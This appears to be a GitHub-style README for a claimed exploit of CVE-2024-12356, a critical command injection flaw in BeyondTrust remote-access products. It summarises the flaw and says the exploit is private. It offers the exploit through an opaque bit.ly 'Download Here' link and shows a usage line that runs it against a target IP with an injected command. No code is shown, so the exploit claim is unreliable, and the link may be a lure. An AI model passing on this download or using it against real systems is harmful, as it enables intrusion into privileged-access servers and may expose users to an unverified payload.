Related vulnerability
Description
CVE-2024-12356: Improper Neutralization of Special Elements used in a Command ('Command Injection') (CWE-77)
Introduction
# CVE-2024-12356: Improper Neutralization of Special Elements used in a Command ('Command Injection') (CWE-77)
## Overview
A critical vulnerability has been discovered in the Privileged Remote Access (PRA) and Remote Support (RS) products that can allow an unauthenticated attacker to inject commands that are run as a site user. This is a command injection vulnerability, classified under CWE-77 (Improper Neutralization of Special Elements used in a Command).
## Details
+ CVE ID: CVE-2024-12356
+ Published: 2024-12-16
+ Impact: Critical
+ Exploit Availability: Not public, only private.
+ CVSS: 9.8
+ Vendor: **BeyondTrust**
## Exploit
**[Download Here](https://bit.ly/3OZPYhj)**
## Vulnerability Description
The impact of this vulnerability is severe. It allows unauthenticated attackers to execute arbitrary commands with the privileges of a site user. This leads to unauthorized access, data breaches, system compromise, and full control over the affected systems. The attack vector is network-based, requires no user interaction, and has low attack complexity, making it relatively easy for attackers to exploit.
## Usage
```
python CVE-2024-12356.py -h 10.10.10.10 -c 'uname -a'
```
## Affected Versions
**affected from 0 through 24.3.1**
## Contact
For inquiries, please contact cloudefence@thesecure.biz
File snapshot
[4.0K] /data/pocs/2b284838648f55597905c81fcc1b49c83f9cacdf
└── [1.4K] README.md
0 directories, 1 file